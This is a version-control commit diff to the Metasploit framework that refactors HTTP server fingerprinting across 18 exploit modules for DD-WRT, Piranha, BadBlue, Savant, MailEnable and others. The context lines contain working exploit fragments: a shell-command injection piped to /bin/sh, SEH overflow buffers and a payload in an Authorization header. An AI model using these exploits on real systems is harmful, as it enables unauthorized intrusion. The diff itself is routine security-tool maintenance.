http fingerprint checking update

git-svn-id: file:///home/svn/framework3/trunk@9719 4d416f70-5f16-0410-b530-b9f4589650da
2010-07-07 17:38:59 +00:00 · 2010-07-07 17:38:59 +00:00 · 663b863b6d
parent ba76698b5a
commit 663b863b6d
18 changed files with 69 additions and 120 deletions
--- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
+++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

+	HttpFingerprint = { :pattern => [ /DD-WRT/ ] }
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -30,11 +32,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					[ 'CVE', '2009-2765'],
+					[ 'CVE', '2009-2765' ],
 					[ 'OSVDB', '55990' ],
 					[ 'BID', '35742' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/9209'],
-
+					[ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
 				],
 			'Platform'       => ['unix'],
 			'Arch'           => ARCH_CMD,
@ -59,10 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit

-		if not (http_fingerprint =~ /DD-WRT/)
-			raise RuntimeError, "The target server doesn\'t seem to be running DD-WRT."
-		end
-
 		cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
 		# TODO: force use of echo-ne CMD encoder
 		str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
--- a/modules/exploits/linux/http/piranha_passwd_exec.rb
+++ b/modules/exploits/linux/http/piranha_passwd_exec.rb
@ -16,6 +16,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

+	HttpFingerprint = { :pattern => [ /Apache/ ] }
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -81,11 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def exploit
-		info = http_fingerprint
-		if not (info =~ /Apache/)
-			raise RuntimeError, 'The target server is not running Apache.'
-		end
-
 		cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
 		str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
 		print_status("Sending GET request with encoded command line...")
@ -103,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
 			print_status("Command successfully executed (according to the server).")
 		end
-
 	end

 end
--- a/modules/exploits/multi/http/sun_jsws_dav_options.rb
+++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb
@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'uri'     => datastore['PATH']
 			}, 5)

-		info = http_fingerprint({ :response => res })
+		info = http_fingerprint({ :response => res })  # check method
 		if (info =~ /Sun/)
 			print_status("Found server: #{info}")
 			return Exploit::CheckCode::Detected
--- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Safe
 		end

-		http_fingerprint({ :response => res })
+		http_fingerprint({ :response => res })  # check method

 		if (res.code != 200)
 			print_status("The server returned #{res.code} #{res.message}")
--- a/modules/exploits/multi/realserver/describe.rb
+++ b/modules/exploits/multi/realserver/describe.rb
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'uri'    => '/'
 			}, 5)

-		info = http_fingerprint({ :response => res })
+		info = http_fingerprint({ :response => res })  # check method / Custom server check
 		if res and res['Server']
 			print_status("Found RTSP: #{res['Server']}")
 			return Exploit::CheckCode::Detected
--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					}
 			}, 5)

-		http_fingerprint({ :response => res })
+		http_fingerprint({ :response => res })  # check method

 		if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
 			ver = $1
--- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					}
 			}, 25)

-		http_fingerprint({ :response => res })
+		http_fingerprint({ :response => res })  # check method

 		if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
 			return Exploit::CheckCode::Vulnerable
--- a/modules/exploits/windows/http/altn_securitygateway.rb
+++ b/modules/exploits/windows/http/altn_securitygateway.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking

+	# XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Seh

@ -75,31 +77,30 @@ class Metasploit3 < Msf::Exploit::Remote

 	# Identify the target based on the SecurityGateway version number
 	def auto_target
-		print_status("Attempting to automatically select a target...")
-		res = send_request_raw(
-			{
-				'uri'   => '/SecurityGateway.dll'
-			}, 10)
-
-		http_fingerprint({ :response => res })
-
-		if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
+		info = http_fingerprint({ :uri => '/SecurityGateway.dll' })  # automatic targetting
+		if (info =~ /SecurityGateway (1\..*)$/)
 			case $1
 			when /1\.0\.1/
 				return self.targets[1]
 			end
 		end
-
 		# Not vulnerable
-		return nil
+		nil
 	end

+	def check
+		if auto_target
+			Exploit::CheckCode::Vulnerable
+		end
+		Exploit::CheckCode::Safe
+	end

 	def exploit

 		# handle auto-targeting
 		mytarget = target
 		if target.name =~ /Automatic/
+			print_status("Attempting to automatically select a target...")
 			mytarget = auto_target
 			if mytarget.nil?
 				raise RuntimeError, "Unable to automatically select a target"
--- a/modules/exploits/windows/http/apache_chunked.rb
+++ b/modules/exploits/windows/http/apache_chunked.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking

+	HttpFingerprint = { :pattern => [ /Apache/ ] }
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -160,14 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote

 	def check
 		response = send_request_raw({'uri' => '/'}, 5)
-
-		http_fingerprint({ :response => response })
-
 		if response.nil?
 			print_status("No response to request")
 			return Exploit::CheckCode::Safe
 		end

+		http_fingerprint({ :response => response })  # Custom Server header matching
+
 		code = Exploit::CheckCode::Appears

 		case response['Server']
@ -196,16 +197,14 @@ class Metasploit3 < Msf::Exploit::Remote

 	def auto_target
 		response = send_request_raw({'uri' => '/'}, 5)
-
-		http_fingerprint({ :response => response })
-
-		targets_to_try = []
-
 		if response.nil?
 			print_error("No response to request")
 			return targets_to_try
 		end

+		http_fingerprint({ :response => response })  # Custom Server header matching / automatic target selection
+
+		targets_to_try = []
 		server_hdr = response['Server']
 		print_status("Server: #{server_hdr}")

--- a/modules/exploits/windows/http/badblue_ext_overflow.rb
+++ b/modules/exploits/windows/http/badblue_ext_overflow.rb
@ -14,7 +14,11 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

-	include Msf::Exploit::Remote::Tcp
+	# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
+	# However, a proper Server header is returned when requesting /index.html or using HEAD.
+	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
+
+	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::Seh

 	def initialize(info = {})
@ -50,40 +54,27 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Apr 20 2003',
 			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				Opt::RPORT(80)
-			], self.class )
 	end

 	def check
-		connect
-
-		sock.put("GET / HTTP/1.0\r\n\r\n")
-		resp = sock.get_once
-		disconnect
-
-		if (resp =~ /BadBlue\/2.5/)
+		info = http_fingerprint  # check method
+		if (info =~ /BadBlue\/2\.5/)
 			return Exploit::CheckCode::Vulnerable
 		end
-		return Exploit::CheckCode::Safe
+		Exploit::CheckCode::Safe
 	end

 	def exploit
-		connect
-
 		uri     = "GET /ext.dll?mfcisapicommand="
 		sploit  = rand_text_alphanumeric(500)
 		seh     = generate_seh_payload(target.ret)
 		sploit[492, seh.length] = seh
+		uri << sploit

 		print_status("Trying target #{target.name}...")
-
-		sock.put(uri + sploit + "\r\n\r\n")
+		send_request_raw({ 'uri' => uri })

 		handler
-		disconnect
 	end

 end
--- a/modules/exploits/windows/http/badblue_passthru.rb
+++ b/modules/exploits/windows/http/badblue_passthru.rb
@ -14,6 +14,10 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
+	# However, a proper Server header is returned when requesting /index.html or using HEAD.
+	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Seh

@ -58,11 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def exploit
-		# NOTE: BadBlue doesn't give any HTTP headers when requesting '/', but it will if requesting /index.html
-		if not (http_fingerprint =~ /BadBlue\//)
-			raise RuntimeError, "The target server doesn't appear to be running BadBlue."
-		end
-
 		seh_offset = 4116
 		sploit = Rex::Text.pattern_create(seh_offset)
 		# Need to jump over the nul byte
--- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
+++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => [ /Apache/ ] }
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::Seh

@ -60,10 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit
 		
-		if not (http_fingerprint =~ /Apache/)
-			raise RuntimeError, "The target server doesn't appear to be running Apache."
-		end
-
 		sploit = rand_text_alphanumeric(5800)
 		sploit[5781, 8] = generate_seh_record(target.ret)
 		# Jump backward to the payload
--- a/modules/exploits/windows/http/efs_easychatserver_username.rb
+++ b/modules/exploits/windows/http/efs_easychatserver_username.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::Seh

@ -64,27 +66,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class )
 	end

-	def auto_target
-		info = http_fingerprint
+	def check
+		info = http_fingerprint # check method
 		# NOTE: Version 2.2 still reports "1.0" in the "Server" header
 		if (info =~ /Easy Chat Server\/1\.0/)
-			return targets[0]
-		end
-		nil
-	end
-
-	def check
-		if auto_target
 			return Exploit::CheckCode::Appears
 		end
 		Exploit::CheckCode::Safe
 	end

 	def exploit
-		if not auto_target
-			raise RuntimeError, "The server doesn't appear to be running a vulnerable EasyChatServer"
-		end
-
 		# randomize some values.
 		val = rand_text_alpha(rand(10) + 1)
 		num = rand_text_numeric(1)
--- a/modules/exploits/windows/http/httpdx_handlepeer.rb
+++ b/modules/exploits/windows/http/httpdx_handlepeer.rb
@ -28,6 +28,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] }
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::Seh

@ -89,23 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 	end

-	def auto_target
-		info = http_fingerprint
-		if info and (info =~ /httpdx\/(.*) \(Win32\)/)
-			ver = $1
-			#print_status("HTTPDX version detected : #{ver}")
-
-			# this will need to be updated if httpdx is ever fixed :)
-			case ver
-			when "1.4"
-				return targets[0]
-			end
-		end
-		nil
-	end
-
 	def check
-		if (auto_target)
+		info = http_fingerprint  # check method
+		if info and (info =~ /httpdx\/(.*) \(Win32\)/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@ -113,10 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-		if not auto_target
-			raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
-		end
-
 		uri = payload.encoded
 		if target['Offset'] > payload_space
 			pad = target['Offset'] - payload_space
--- a/modules/exploits/windows/http/httpdx_tolog_format.rb
+++ b/modules/exploits/windows/http/httpdx_tolog_format.rb
@ -226,7 +226,7 @@ For now, that will have to be done manually.


 	def get_version
-		info = http_fingerprint
+		info = http_fingerprint # Custom version extraction / automatic target
 		if info and (info =~ /httpdx\/(.*) \(Win32\)/)
 			return $1
 		end
--- a/modules/exploits/windows/http/mailenable_auth_header.rb
+++ b/modules/exploits/windows/http/mailenable_auth_header.rb
@ -14,6 +14,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => [ /MailEnable/ ] }
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -51,9 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def check
-		info = http_fingerprint
-
-		if (info =~ /.*MailEnable/)
+		info = http_fingerprint  # check method
+		if (info =~ /MailEnable/)
 			return Exploit::CheckCode::Appears
 		end
 		Exploit::CheckCode::Safe
@ -62,7 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')

-		send_request_raw({
+		send_request_raw(
+			{
 				'headers' => { 'Authorization' => buffer }
 			}, 2)

--- a/modules/exploits/windows/http/savant_31_overflow.rb
+++ b/modules/exploits/windows/http/savant_31_overflow.rb
@ -15,6 +15,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking

+	HttpFingerprint = { :pattern => /Savant\/3\.1/ }
+
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -69,16 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultTarget' => 0))
 	end

-	def auto_target
-		info = http_fingerprint
-		if info and (info =~ /Savant\/3\.1/)
-			return targets[0]
-		end
-		nil
-	end
-
 	def check
-		if (auto_target)
+		info = http_fingerprint  # check method
+		if info and (info =~ /Savant\/3\.1/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@ -112,11 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote


 	def exploit
-		mytarget = auto_target
-		if not mytarget
-			raise RuntimeError, 'The target web server is not Savant 3.1'
-		end
-
 		print_status("Searching for a suitable nopsled...")
 		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
 		until findnop
@ -124,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end

 		print_status("Found one! Sending exploit.")
-		sploit = findnop + " /" + payload.encoded + [mytarget['Ret']].pack('V')
+		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
 		res = send_request_raw(
 			{
 				'method'  => sploit,
--- a/modules/exploits/windows/isapi/w3who_query.rb
+++ b/modules/exploits/windows/isapi/w3who_query.rb
@ -14,6 +14,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking

+	# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
@ -68,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def auto_target
+
 		res = send_request_raw(
 			{
 				'uri'   => datastore['URL']
 			}, -1)
-
-		http_fingerprint({ :response => res })
+		http_fingerprint({ :response => res })  # XXX: Needs custom body match

 		# Was a vulnerable system detected?
 		t = nil